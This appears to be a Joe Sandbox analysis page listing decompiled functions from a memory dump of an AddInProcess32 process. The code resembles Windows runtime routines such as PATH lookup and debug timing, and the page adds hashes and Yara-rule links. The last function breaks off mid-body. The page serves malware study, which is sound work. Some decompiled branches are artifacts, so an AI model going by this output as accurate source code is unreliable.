Function 01870050 Relevance: 1.6, APIs: 1, Instructions: 81
timeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E01870050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x194d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E01889ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0189B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E01928A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E01889702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x194b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x01870055
0x0187005d
0x01870062
0x0187006c
0x0187006f
0x01870074
0x0187007a
0x0187007a
0x01870080
0x01870080
0x01870087
0x0187008d
0x0187008f
0x01870093
0x01870095
0x0187009b
0x018700f8
0x018700fb
0x018700fc
0x018700ff
0x01870108
0x01870108
0x018700a2
0x018700a6
0x018700b3
0x018700bc
0x018700c5
0x018700ca
0x018bc01e
0x00000000
0x00000000
0x018bc02d
0x018700d5
0x018700d9
0x018bc03d
0x018bc046
0x018bc046
0x018700df
0x018700e2
0x018700ea
0x018700ef
0x018700f2
0x018700f6
0x01870111
0x01870117
0x01870117
0x00000000
0x018700f6
0x018700d0
0x018700d0
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 01870111

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 213ecd0fe9a283ebd2aad3bb7fad70017289e6fc32279ce7efde9465e137a3c5
Instruction ID: 78a6b01125df5c0c53ee407781daac87e8c26025f00bfc3518c71f154d90c0cc
Opcode Fuzzy Hash: 213ecd0fe9a283ebd2aad3bb7fad70017289e6fc32279ce7efde9465e137a3c5
Instruction Fuzzy Hash: C0317A31601A048FD726CB28C880BA6B7E5FB89724F144569E59AC7B90EB75E901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01882581 Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E01882581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35, char _a1546912132) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t240;
				signed int _t244;
				signed int _t245;
				signed int _t248;
				signed int _t250;
				intOrPtr _t252;
				signed int _t255;
				signed int _t262;
				signed int _t265;
				signed int _t273;
				signed int _t279;
				signed int _t281;
				void* _t283;
				signed int _t284;
				unsigned int _t287;
				signed int _t291;
				signed int* _t292;
				signed int _t293;
				signed int _t297;
				intOrPtr _t309;
				signed int _t318;
				signed int _t320;
				signed int _t321;
				signed int _t325;
				signed int _t326;
				signed int _t330;
				signed int _t332;
				signed int _t334;
				signed int _t335;
				signed int _t337;

				_t332 = _t334;
				_t335 = _t334 - 0x4c;
				_v8 =  *0x194d360 ^ _t332;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t325 = 0x194b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t287 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t279 = 0x48;
				_t307 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t318 = 0;
				_v37 = _t307;
				if(_v48 <= 0) {
					L16:
					_t45 = _t279 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t326 = 0xc0000106;
						goto L32;
					} else {
						_t325 = L01874620(_t287,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t279);
						_v52 = _t325;
						__eflags = _t325;
						if(_t325 == 0) {
							_t326 = 0xc0000017;
							goto L32;
						} else {
							 *(_t325 + 0x44) =  *(_t325 + 0x44) & 0x00000000;
							_t50 = _t325 + 0x48; // 0x48
							_t320 = _t50;
							_t307 = _v32;
							 *(_t325 + 0x3c) = _t279;
							_t281 = 0;
							 *((short*)(_t325 + 0x30)) = _v48;
							__eflags = _t307;
							if(_t307 != 0) {
								 *(_t325 + 0x18) = _t320;
								__eflags = _t307 - 0x1948478;
								 *_t325 = ((0 | _t307 == 0x01948478) - 0x00000001 & 0xfffffffb) + 7;
								E0189F3E0(_t320,  *((intOrPtr*)(_t307 + 4)),  *_t307 & 0x0000ffff);
								_t307 = _v32;
								_t335 = _t335 + 0xc;
								_t281 = 1;
								__eflags = _a8;
								_t320 = _t320 + (( *_t307 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t273 = E018E39F2(_t320);
									_t307 = _v32;
									_t320 = _t273;
								}
							}
							_t291 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t326 = _v68;
								__eflags = 0;
								 *((short*)(_t320 - 2)) = 0;
								goto L32;
							} else {
								_t279 = _t325 + _t281 * 4;
								_v56 = _t279;
								do {
									__eflags = _t307;
									if(_t307 != 0) {
										_t240 =  *(_v60 + _t291 * 4);
										__eflags = _t240;
										if(_t240 == 0) {
											goto L30;
										} else {
											__eflags = _t240 == 5;
											if(_t240 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t279 =  *(_v60 + _t291 * 4);
										 *(_t279 + 0x18) = _t320;
										_t244 =  *(_v60 + _t291 * 4);
										__eflags = _t244 - 8;
										if(_t244 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t244 * 4 +  &M01882959))) {
												case 0:
													__ax =  *0x1948488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0189F3E0(__edi,  *0x194848c, __ax & 0x0000ffff);
														__eax =  *0x1948488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0189F3E0(_t320, _v80, _v64);
													_t268 = _v64;
													goto L26;
												case 2:
													 *0x1948480 & 0x0000ffff = E0189F3E0(__edi,  *0x1948484,  *0x1948480 & 0x0000ffff);
													__eax =  *0x1948480 & 0x0000ffff;
													__eax = ( *0x1948480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0189F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0189F3E0(_t320, _v76, _v36);
														_t268 = _v36;
													}
													L26:
													_t335 = _t335 + 0xc;
													_t320 = _t320 + (_t268 >> 1) * 2 + 2;
													__eflags = _t320;
													L27:
													_push(0x3b);
													_pop(_t270);
													 *((short*)(_t320 - 2)) = _t270;
													goto L28;
												case 6:
													__ebx =  *0x194575c;
													__eflags = __ebx - 0x194575c;
													if(__ebx != 0x194575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0189F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x194575c;
														} while (__ebx != 0x194575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1948478 & 0x0000ffff = E0189F3E0(__edi,  *0x194847c,  *0x1948478 & 0x0000ffff);
													__eax =  *0x1948478 & 0x0000ffff;
													__eax = ( *0x1948478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E018E39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1946e58 & 0x0000ffff = E0189F3E0(__edi,  *0x1946e5c,  *0x1946e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1946e58 & 0x0000ffff;
													__eax = ( *0x1946e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t291 = _v16;
													_t307 = _v32;
													L29:
													_t279 = _t279 + 4;
													__eflags = _t279;
													_v56 = _t279;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t291 = _t291 + 1;
									_v16 = _t291;
									__eflags = _t291 - _v48;
								} while (_t291 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t244 =  *(_v60 + _t318 * 4);
						if(_t244 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t244 * 4 +  &M01882935))) {
							case 0:
								__ax =  *0x1948488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t307 =  &_v64;
								_v80 = E01882E3E(0,  &_v64);
								_t279 = _t279 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1948480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1948480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0186EEF0(0x19479a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0186EB70(__ecx, 0x19479a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t218 = _v72;
											__eflags = _t218;
											if(_t218 != 0) {
												L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
											}
											_t219 = _v52;
											__eflags = _t219;
											if(_t219 != 0) {
												__eflags = _t326;
												if(_t326 < 0) {
													L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
													_t219 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t287 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1947b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01874620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0186EB70(__ecx, 0x19479a0);
										__eax = _v52;
										L36:
										_pop(_t319);
										_pop(_t327);
										__eflags = _v8 ^ _t332;
										_pop(_t280);
										return E0189B640(_t219, _t280, _v8 ^ _t332, _t307, _t319, _t327);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t275 = _v56;
								if(_v56 != 0) {
									_t307 =  &_v36;
									_t277 = E01882E3E(_t275,  &_v36);
									_t287 = _v36;
									_v76 = _t277;
								}
								if(_t287 == 0) {
									goto L44;
								} else {
									_t279 = _t279 + 2 + _t287;
								}
								goto L14;
							case 6:
								__eax =  *0x1945764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1948478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1948478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1946e58 & 0x0000ffff;
								__eax = ( *0x1946e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t318 = _t318 + 1;
								if(_t318 >= _v48) {
									goto L16;
								} else {
									_t307 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t292 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					 *_t292 = _t244;
					asm("o16 sub [eax-0x77d81fff], cl");
					 *_t325 =  *_t325 + _t332;
					 *[es:ecx] = _t244;
					_t328 = _t325 + 1;
					 *((intOrPtr*)(_t244 - 0x77d9faff)) =  *((intOrPtr*)(_t244 - 0x77d9faff)) - _t292;
					 *_t320 =  *_t320 + _t279;
					_pop(_t283);
					 *_t292 = es;
					_t245 = _t335;
					_t337 = _t244;
					 *((intOrPtr*)(_t245 - 0x73a4caff)) =  *((intOrPtr*)(_t245 - 0x73a4caff)) - _t292;
					 *_t307 =  *_t307 + _t245;
					 *((intOrPtr*)(_t245 - 0x77d77fff)) =  *((intOrPtr*)(_t245 - 0x77d77fff)) - _t292;
					_t329 = _t325 + 1 + _t328;
					asm("daa");
					 *_t292 = _t245;
					_push(ds);
					 *((intOrPtr*)(_t245 - 0x77d7b1ff)) =  *((intOrPtr*)(_t245 - 0x77d7b1ff)) - _t292;
					_a35 = _a35 + _t283;
					 *_t292 = _t245;
					asm("fcomp dword [ebx-0x74]");
					 *((intOrPtr*)(_t245 +  &_a1546912132)) =  *((intOrPtr*)(_t245 +  &_a1546912132)) + _t325 + 1 + _t328;
					 *_t292 = es;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x192ff00);
					E018AD08C(_t283, _t320, _t329);
					_v44 =  *[fs:0x18];
					_t321 = 0;
					 *_a24 = 0;
					_t284 = _a12;
					__eflags = _t284;
					if(_t284 == 0) {
						_t248 = 0xc0000100;
					} else {
						_v8 = 0;
						_t330 = 0xc0000100;
						_v52 = 0xc0000100;
						_t250 = 4;
						while(1) {
							_v40 = _t250;
							__eflags = _t250;
							if(_t250 == 0) {
								break;
							}
							_t297 = _t250 * 0xc;
							_v48 = _t297;
							__eflags = _t284 -  *((intOrPtr*)(_t297 + 0x1831664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t265 = E0189E5C0(_a8,  *((intOrPtr*)(_t297 + 0x1831668)), _t284);
									_t337 = _t337 + 0xc;
									__eflags = _t265;
									if(__eflags == 0) {
										_t330 = E018D51BE(_t284,  *((intOrPtr*)(_v48 + 0x183166c)), _a16, _t321, _t330, __eflags, _a20, _a24);
										_v52 = _t330;
										break;
									} else {
										_t250 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t250 = _t250 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t330;
						__eflags = _t330;
						if(_t330 < 0) {
							__eflags = _t330 - 0xc0000100;
							if(_t330 == 0xc0000100) {
								_t293 = _a4;
								__eflags = _t293;
								if(_t293 != 0) {
									_v36 = _t293;
									__eflags =  *_t293 - _t321;
									if( *_t293 == _t321) {
										_t330 = 0xc0000100;
										goto L76;
									} else {
										_t309 =  *((intOrPtr*)(_v44 + 0x30));
										_t252 =  *((intOrPtr*)(_t309 + 0x10));
										__eflags =  *((intOrPtr*)(_t252 + 0x48)) - _t293;
										if( *((intOrPtr*)(_t252 + 0x48)) == _t293) {
											__eflags =  *(_t309 + 0x1c);
											if( *(_t309 + 0x1c) == 0) {
												L106:
												_t330 = E01882AE4( &_v36, _a8, _t284, _a16, _a20, _a24);
												_v32 = _t330;
												__eflags = _t330 - 0xc0000100;
												if(_t330 != 0xc0000100) {
													goto L69;
												} else {
													_t321 = 1;
													_t293 = _v36;
													goto L75;
												}
											} else {
												_t255 = E01866600( *(_t309 + 0x1c));
												__eflags = _t255;
												if(_t255 != 0) {
													goto L106;
												} else {
													_t293 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t330 = E01882C50(_t293, _a8, _t284, _a16, _a20, _a24, _t321);
											L76:
											_v32 = _t330;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0186EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t330 = _a24;
									_t262 = E01882AE4( &_v36, _a8, _t284, _a16, _a20, _t330);
									_v32 = _t262;
									__eflags = _t262 - 0xc0000100;
									if(_t262 == 0xc0000100) {
										_v32 = E01882C50(_v36, _a8, _t284, _a16, _a20, _t330, 1);
									}
									_v8 = _t321;
									E01882ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t248 = _t330;
					}
					L70:
					return E018AD0D1(_t248);
				}
				L108:
			}

0x01882584
0x01882586
0x01882590
0x01882596
0x01882597
0x01882598
0x01882599
0x0188259e
0x018825a4
0x018825a9
0x018825ac
0x018825ae
0x018825b1
0x018825b2
0x018825b5
0x018825b8
0x018825bb
0x018825bc
0x018825bf
0x018825c2
0x018825c5
0x018825c6
0x018825cb
0x018825ce
0x018825d8
0x018825dd
0x018825de
0x018825e1
0x018825e3
0x018825e9
0x018826da
0x018826da
0x018826dd
0x018826e2
0x018c5b56
0x00000000
0x018826e8
0x018826f9
0x018826fb
0x018826fe
0x01882700
0x018c5b60
0x00000000
0x01882706
0x01882706
0x0188270a
0x0188270a
0x0188270d
0x01882713
0x01882716
0x01882718
0x0188271c
0x0188271e
0x018c5b6c
0x018c5b6f
0x018c5b7f
0x018c5b89
0x018c5b8e
0x018c5b93
0x018c5b96
0x018c5b9c
0x018c5ba0
0x018c5ba3
0x018c5bab
0x018c5bb0
0x018c5bb3
0x018c5bb3
0x018c5ba3
0x01882724
0x01882726
0x01882729
0x0188272c
0x0188279d
0x0188279d
0x018827a0
0x018827a2
0x00000000
0x0188272e
0x0188272e
0x01882731
0x01882734
0x01882734
0x01882736
0x018c5bc1
0x018c5bc1
0x018c5bc4
0x00000000
0x018c5bca
0x018c5bca
0x018c5bcd
0x00000000
0x018c5bd3
0x00000000
0x018c5bd3
0x018c5bcd
0x0188273c
0x0188273c
0x01882742
0x01882747
0x0188274a
0x0188274d
0x01882750
0x00000000
0x01882756
0x01882756
0x00000000
0x01882902
0x01882908
0x0188290b
0x00000000
0x01882911
0x0188291c
0x01882921
0x00000000
0x01882921
0x00000000
0x00000000
0x01882880
0x01882887
0x0188288c
0x00000000
0x00000000
0x01882805
0x0188280a
0x01882814
0x01882816
0x00000000
0x00000000
0x0188281e
0x01882821
0x01882823
0x00000000
0x01882829
0x01882829
0x01882831
0x0188283c
0x0188283e
0x00000000
0x0188283e
0x00000000
0x00000000
0x0188284e
0x01882850
0x01882851
0x01882854
0x01882857
0x0188285a
0x0188285c
0x0188285d
0x00000000
0x00000000
0x0188275d
0x01882761
0x00000000
0x01882767
0x0188276e
0x01882773
0x01882773
0x01882776
0x01882778
0x0188277e
0x0188277e
0x01882781
0x01882781
0x01882783
0x01882784
0x00000000
0x00000000
0x018c5bd8
0x018c5bde
0x018c5be4
0x018c5be6
0x018c5be8
0x018c5be9
0x018c5bee
0x018c5bf8
0x018c5bff
0x018c5c01
0x018c5c04
0x018c5c07
0x018c5c0b
0x018c5c0d
0x018c5c0d
0x018c5c15
0x018c5c18
0x018c5c1b
0x018c5c1b
0x018c5c1e
0x00000000
0x00000000
0x018828c3
0x018828c8
0x018828d2
0x018828d4
0x018828d8
0x018828db
0x018c5c26
0x018c5c28
0x018c5c2d
0x018c5c2d
0x00000000
0x00000000
0x018c5c34
0x018c5c36
0x018c5c49
0x018c5c4e
0x018c5c54
0x018c5c5b
0x018c5c5d
0x018c5c60
0x01882788
0x01882788
0x0188278b
0x0188278e
0x0188278e
0x0188278e
0x01882791
0x00000000
0x00000000
0x01882756
0x01882750
0x00000000
0x01882794
0x01882794
0x01882795
0x01882798
0x01882798
0x00000000
0x01882734
0x0188272c
0x01882700
0x018825ef
0x018825ef
0x018825ef
0x018825f2
0x018825f8
0x00000000
0x00000000
0x018825fe
0x00000000
0x018828e6
0x018828ec
0x018828ef
0x018828f5
0x018828f8
0x018828f8
0x00000000
0x018828f8
0x00000000
0x00000000
0x01882866
0x01882866
0x01882876
0x01882879
0x00000000
0x00000000
0x018827e0
0x018827e7
0x018827e9
0x018827eb
0x018c5afd
0x00000000
0x018c5afd
0x00000000
0x00000000
0x01882633
0x01882638
0x0188263b
0x0188263c
0x0188263e
0x01882640
0x01882642
0x01882647
0x01882649
0x0188264e
0x01882650
0x01882653
0x01882659
0x018826a2
0x018826a7
0x018826ac
0x018826b2
0x018c5b11
0x018c5b15
0x018c5b17
0x00000000
0x018826b8
0x018826b8
0x018826ba
0x018827a6
0x018827a6
0x018827a9
0x018827ab
0x018827b9
0x018827b9
0x018827be
0x018827c1
0x018827c3
0x018827c5
0x018827c7
0x018c5c74
0x018c5c79
0x018c5c79
0x018827c7
0x00000000
0x018826c0
0x018826c0
0x018826c3
0x018826c6
0x018826c6
0x018826c9
0x018826c9
0x00000000
0x018826c9
0x018826ba
0x0188265b
0x0188265b
0x0188265e
0x01882667
0x0188266d
0x01882677
0x0188267c
0x0188267f
0x01882681
0x018c5b49
0x018c5b4e
0x018827cd
0x018827d0
0x018827d1
0x018827d2
0x018827d4
0x018827dd
0x01882687
0x01882687
0x0188268a
0x0188268b
0x0188268e
0x0188268f
0x01882691
0x01882696
0x01882698
0x0188269d
0x0188269f
0x00000000
0x0188269f
0x01882681
0x00000000
0x00000000
0x01882846
0x00000000
0x00000000
0x01882605
0x0188260a
0x0188260c
0x01882611
0x01882616
0x01882619
0x01882619
0x0188261e
0x00000000
0x01882624
0x01882627
0x01882627
0x00000000
0x00000000
0x018c5b1f
0x00000000
0x00000000
0x01882894
0x0188289b
0x0188289d
0x018828a1
0x018c5b2b
0x018c5b2e
0x018c5b2e
0x018828a7
0x018828a9
0x018c5b04
0x018c5b09
0x018c5b09
0x018c5b09
0x00000000
0x00000000
0x018c5b35
0x018c5b3c
0x018828fb
0x018828fb
0x018826cc
0x018826cc
0x018826d0
0x00000000
0x018826d2
0x018826d2
0x00000000
0x018826d2
0x00000000
0x00000000
0x018825fe
0x0188292d
0x0188292f
0x01882930
0x01882935
0x01882937
0x01882939
0x01882940
0x01882942
0x01882945
0x01882946
0x0188294c
0x0188294e
0x0188294f
0x01882951
0x01882951
0x01882952
0x01882958
0x0188295a
0x01882960
0x01882962
0x01882963
0x01882965
0x01882966
0x0188296c
0x0188296f
0x01882971
0x01882974
0x0188297b
0x0188297d
0x0188297e
0x0188297f
0x01882980
0x01882981
0x01882982
0x01882983
0x01882984
0x01882985
0x01882986
0x01882987
0x01882988
0x01882989
0x0188298a
0x0188298b
0x0188298c
0x0188298d
0x0188298e
0x0188298f
0x01882990
0x01882992
0x01882997
0x018829a3
0x018829a6
0x018829ab
0x018829ad
0x018829b0
0x018829b2
0x018c5c80
0x018829b8
0x018829b8
0x018829bb
0x018829c0
0x018829c5
0x018829c6
0x018829c6
0x018829c9
0x018829cb
0x00000000
0x00000000
0x018829cd
0x018829d0
0x018829d9
0x018829db
0x018829dd
0x01882a7f
0x01882a84
0x01882a87
0x01882a89
0x018c5ca1
0x018c5ca3
0x00000000
0x01882a8f
0x01882a8f
0x00000000
0x01882a8f
0x00000000
0x018829e3
0x018829e3
0x018829e3
0x00000000
0x018829e3
0x018829dd
0x00000000
0x018829db
0x018829e6
0x018829e9
0x018829eb
0x018829ed
0x018829f3
0x018829f5
0x018829f8
0x018829fa
0x01882a97
0x01882a9a
0x01882a9d
0x01882add
0x00000000
0x01882a9f
0x01882aa2
0x01882aa5
0x01882aa8
0x01882aab
0x018c5cab
0x018c5caf
0x018c5cc5
0x018c5cda
0x018c5cdc
0x018c5cdf
0x018c5ce5
0x00000000
0x018c5ceb
0x018c5ced
0x018c5cee
0x00000000
0x018c5cee
0x018c5cb1
0x018c5cb4
0x018c5cb9
0x018c5cbb
0x00000000
0x018c5cbd
0x018c5cbd
0x00000000
0x018c5cbd
0x018c5cbb
0x01882ab1
0x01882ab1
0x01882ac4
0x01882ac6
0x01882ac6
0x00000000
0x01882ac6
0x01882aab
0x00000000
0x01882a00
0x01882a09
0x01882a0e
0x01882a21
0x01882a24
0x01882a35
0x01882a3a
0x01882a3d
0x01882a42
0x01882a59
0x01882a59
0x01882a5c
0x01882a5f
0x01882a5f
0x018829fa
0x018829f3
0x01882a64
0x01882a64
0x01882a6b
0x01882a6b
0x01882a6d
0x01882a72
0x01882a72
0x00000000

Strings

PATH, xrefs: 01882642, 01882691

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 22182c37b7bf2a5e27d701b7d11a4d26bc2b7a1f97ff3aaf733eb46c622a0db4
Instruction ID: 937ea351c3900cb50246f0b5d648c451027de6ee234e5206c280c02ebb3edca4
Opcode Fuzzy Hash: 22182c37b7bf2a5e27d701b7d11a4d26bc2b7a1f97ff3aaf733eb46c622a0db4
Instruction Fuzzy Hash: 08C17F75E00219EBDB25FF9DD880AADBBB6FF48754F484029E901EB250D734AA41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0185C962 Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0185C962(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				intOrPtr _t22;
				void* _t26;
				void* _t27;
				void* _t32;
				intOrPtr _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x194d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0186EEF0(0x19470a0);
